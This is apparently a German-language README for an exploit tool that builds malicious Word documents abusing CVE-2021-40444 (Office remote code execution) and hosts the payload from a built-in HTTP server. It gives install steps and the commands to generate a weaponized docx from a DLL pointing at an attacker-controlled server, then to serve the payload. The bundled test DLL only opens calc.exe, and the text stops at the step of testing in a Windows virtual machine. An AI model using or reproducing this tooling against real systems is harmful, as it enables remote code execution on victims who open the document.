
Erzeugt bösartige DOCX-Dokumente, die CVE-2021-40444 (Microsoft Office Word RCE) ausnutzen, mit einem integrierten HTTP-Server zum Hosting der Payload.
Böswilliger Docx-Generator zur Ausnutzung von CVE-2021-40444 (Microsoft Office Word Remote Code Execution)
Die Erstellung dieses Skripts basiert auf Reverse Engineering der im Feld verwendeten Probe: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx-Datei)
Sie müssen zuerst lcab installieren (sudo apt-get install lcab)
Siehe REPRODUCE.md für manuelle Reproduktionsschritte
Wenn Ihre generierte CAB-Datei nicht funktioniert, versuchen Sie, die URL von exploit.html auf calc.cab zu setzen
Generieren Sie zunächst ein böswilliges docx-Dokument aus einer DLL. Sie können die Datei unter test/calc.dll verwenden, die einfach einen calc.exe-Aufruf über system() startet.
python3 exploit.py generate test/calc.dll http://<SRV IP>

Sobald Sie das böswillige docx generiert haben (wird unter out/ abgelegt), können Sie den Server einrichten:
sudo python3 exploit.py host 80

Testen Sie das docx schließlich in einer virtuellen Windows-Maschine:
